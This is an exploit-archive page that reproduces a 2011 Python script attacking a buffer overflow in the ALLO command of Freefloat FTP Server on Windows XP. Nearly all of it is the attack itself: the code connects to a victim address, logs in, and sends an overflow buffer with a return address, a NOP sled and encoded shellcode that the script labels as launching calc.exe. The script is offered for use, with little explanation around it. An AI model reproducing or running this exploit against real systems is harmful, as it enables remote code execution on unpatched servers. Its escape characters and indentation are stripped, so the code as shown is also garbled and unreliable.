Home / exploitsPDF  

Freefloat FTP Server ALLO Buffer Overflow

Posted on 21 August 2011

#!/usr/bin/python

# Exploit Title: Freefloat FTP Server ALLO Buffer Overflow Vulnerability
# Date: 2011 Aug 20
# Author: Black.Spook
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP2 EN


import socket
import sys

def usage():

print "usage  : ./freefloatftp.py <victim_ip>  <victim_port>"
print "example: ./freefloatftp.py 192.168.1.100 21"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


print "
"
print "#############################################################################"
print "#      Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit      #"
print "#############################################################################"
print "
"


if len(sys.argv) != 3:
usage()
sys.exit()

ip   = sys.argv[1]
port = sys.argv[2]

junk1= "x41" * 246
ret  = "xEDx1Ex94x7C" #7C941EED JMP ESP
nop  = "x90"* 200
# windows/exec          CMD=calc.exe
shellcode =("x89xe3xdbxd4xd9x73xf4x5dx55x59x49x49x49x49"
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51"
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32"
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41"
"x42x75x4ax49x4dx6fx58x70x56x4fx54x70x4dx6e"
"x58x59x58x4bx54x69x5ax69x4dx61x56x53x4bx69"
"x52x54x45x74x4bx44x43x6ax45x61x50x7ax45x42"
"x4dx53x58x42x54x44x43x33x4dx5ax45x71x58x52"
"x50x4bx4dx46x5ax76x4dx4bx4cx74x43x56x45x77"
"x49x6cx45x6dx4cx43x56x76x54x6ex56x39x4bx70"
"x54x4bx4bx4ex51x39x4dx54x4dx77x51x65x51x6f"
"x45x6cx54x73x49x6bx4dx78x45x63x4cx34x58x36"
"x4ex6ex50x7ax47x75x54x37x56x6fx58x50x4bx75"
"x47x69x49x63x47x5ax54x5ax4bx4ax5ax6ax4bx55"
"x50x6fx4bx4bx54x4bx45x4bx4dx4fx4dx79x58x44"
"x56x30x54x72x51x4ex51x70x47x54x4ex6fx43x6f"
"x4ex46x51x33x4cx6fx56x47x5ax63x5ax53x43x74"
"x5ax32x49x5ax45x73x58x74x4ex49x4ex65x4bx6b"
"x51x6ex49x65x50x35x49x4ax51x43x5ax45x56x6a"
"x4dx45x4ex38x49x4ex49x69x56x44x54x49x54x6f"
"x47x71x52x37x50x75x49x6cx47x4cx4ex78x50x78"
"x4bx4cx52x59x47x6ex45x33x4cx4bx52x51x51x4d"
"x47x6ex4ex6cx43x71x47x6cx4fx34x56x79x43x64"
"x4cx46x4ex6fx4fx4ax4dx6cx56x57x47x33x43x6c"
"x47x46x47x4bx47x58x45x7ax54x50x43x6fx4ex4f"
"x4bx4fx54x6ax51x4bx54x64x49x6ex4bx4cx5ax4a"
"x51x6ex56x45x4ex39x4cx77x54x65x43x74x54x38"
"x47x6dx4cx4bx50x79x4cx5ax58x79x50x74x4bx6c"
"x4ex30x5ax4bx51x71x52x46x4dx6bx45x31x51x67"
"x58x6ax4bx71x5ax6cx52x57x4bx44x4bx79x51x6e"
"x54x50x4fx35x43x72x56x71x50x67x5ax7ax4bx30"
"x50x56x4fx67x4ex70x4bx39x49x6ex50x30x43x4d"
"x51x48x52x63x51x4dx51x6ex58x36x4bx37x56x38"
"x49x6dx54x73x52x57x4fx6fx47x6dx45x66x51x62"
"x4bx6bx4cx59x4fx5ax54x4ex54x34x52x6cx58x4d"
"x4dx6dx50x75x51x55x4cx6ex45x70x58x66x54x45"
"x47x6fx5ax67x4cx4ex4ex4cx51x4fx41x41")


buff   = junk1 + ret + nop + shellcode

try:
print("[-] Connecting to " + ip + " on port " + port + "
")
s.connect((ip,int(port)))
data = s.recv(1024)
print("[-] Sending exploit...")
s.send("USER test
")
s.recv(1024)
s.send("PASS test
")
s.recv(1024)
s.send("ALLO "+buff+"
")
s.close()
print("[-] Exploit successfully sent...")
except:
print("[-] Connection error...")
print("[-] Check if victim is up.")

 

TOP

Malware :

Exploits :